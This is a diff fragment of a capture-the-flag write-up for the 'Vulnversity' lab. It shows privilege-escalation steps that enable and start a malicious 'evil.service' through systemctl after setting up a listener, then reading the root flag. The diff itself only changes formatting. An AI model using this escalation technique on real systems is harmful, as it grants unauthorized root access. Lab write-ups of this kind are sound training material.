Natounet/CTF_Writeups/Vulnversity.md

 The ExecStart parameter is where you can set your command.
 Setup a listener then enable the servic
 If the path to systemctl is different, modify it.
--> /bin/systemctl enable /path/to/your/service/evil.service
+> /bin/systemctl enable /path/to/your/service/evil.service

--> /bin/systemctl start evil
+> /bin/systemctl start evil

-5. #Root
+# 5. Root

 Now we have root, we can access the /root/root.txt and get the flag.